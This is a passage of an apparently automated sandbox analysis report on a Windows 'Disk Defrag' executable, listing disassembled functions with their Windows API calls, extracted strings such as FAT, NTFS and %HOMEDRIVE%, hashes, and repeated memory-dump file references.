                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1631410767
                                                                                                                                                                                                                                                                                                • Opcode ID: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c3eec78f5ba70d7f73749eb8d42c303dcc8a252b1b76d151490117dce650f0e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F34119717802055BEB10AF75CD82FBA3284DB59764F000A3EFA06EF2D2DA6CDC48466D
                                                                                                                                                                                                                                                                                                Function 004238A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemPowerStatus.KERNEL32 ref: 00423907
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(00000001,00000000), ref: 004239E8
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(1088D068,00000000), ref: 00423A15
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LongNamePath$PowerStatusSystem
                                                                                                                                                                                                                                                                                                • String ID: 3400003
                                                                                                                                                                                                                                                                                                • API String ID: 2229323602-2398869336
                                                                                                                                                                                                                                                                                                • Opcode ID: 1774eee42c2f9bc1d1c4b8b4087ba9fc768ba30c676f6cd1993615a2d7b343a3
                                                                                                                                                                                                                                                                                                • Instruction ID: 559a5a5f11ad9cbb26b2ef481da3000354db79d5173c1cf665cce4c119cf32f6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1774eee42c2f9bc1d1c4b8b4087ba9fc768ba30c676f6cd1993615a2d7b343a3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C51C6712083419FD310EF20DD85BABB7F8AF88715F50092EF199921D1DB78AA49CB5A
                                                                                                                                                                                                                                                                                                Function 00422A90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422C04
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                                • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                                • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                                • Opcode ID: 7b3785d154c84e13650d4089b12ddb33fc3ddbb9f3bc8d58731a5152a72f2c07
                                                                                                                                                                                                                                                                                                • Instruction ID: 0b9e0d0bd62f39a9103a5831cbb30b95e2098115bf74eedd830be0e4041926e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b3785d154c84e13650d4089b12ddb33fc3ddbb9f3bc8d58731a5152a72f2c07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 644196313007059FC728EE2DDD85BAAB7E1BF84304F94852EED468F385DAB4B845C654
                                                                                                                                                                                                                                                                                                Function 00402A30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75A7AF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA20: SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00004001), ref: 0041AA4D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001214,00000004,00000000), ref: 00402B9F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileInfoMessageSend$DriveDrivesLogicalType
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 2359154852-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                                • Instruction ID: 82d795afe4258906e57f36ef34ec2eb48dfa52df3f098ca2abc9abbdf1da0df4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D541D6717443406BE324DF61DC86FAA73A4AB84B04F00492DF249AB2C1DBB4A545CB9A
                                                                                                                                                                                                                                                                                                Function 00461900 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004619BD
                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,Disk Defrag,00040010), ref: 004619FE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLastMessage
                                                                                                                                                                                                                                                                                                • String ID: %c:\$Disk Defrag
                                                                                                                                                                                                                                                                                                • API String ID: 463093485-3222931339
                                                                                                                                                                                                                                                                                                • Opcode ID: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                                • Instruction ID: 731faf273718486ffcde032920aca0e1f319cedce5eb76f7311323341e126d0a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E64195712087419FC324DF25D845B6BB7E4EF84715F044A2EF599C7290EB74A808CB9B
                                                                                                                                                                                                                                                                                                Function 00410B80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,?), ref: 00410C49
                                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(%HOMEDRIVE%,?,0000000C), ref: 00410C8F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandInformationStringsVolume
                                                                                                                                                                                                                                                                                                • String ID: %HOMEDRIVE%$NTFS
                                                                                                                                                                                                                                                                                                • API String ID: 1751349637-3402063299
                                                                                                                                                                                                                                                                                                • Opcode ID: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                                • Instruction ID: 637acb8aad6857eaaece39300668810a01c8d3601b07b0b48692e68ec32a0e85
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 224160706083019BD714DF75CA86BAB77E4AF88704F40493EB949C7291EBB8D984CB5A
                                                                                                                                                                                                                                                                                                Function 004629B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,?,?,?,?,?,?,004619AE), ref: 004629EC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                • String ID: FAT$FAT16$FAT32
                                                                                                                                                                                                                                                                                                • API String ID: 2039140958-3969911809
                                                                                                                                                                                                                                                                                                • Opcode ID: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                                • Instruction ID: 45468f2d8361374e2203d088d382e4daaec04f6418c830f46f854969d88bf3c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16112175A18300AED754EF789D92B6B77E4AF88704F84492EF848C3251F678D604CB9B
                                                                                                                                                                                                                                                                                                Function 004226A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
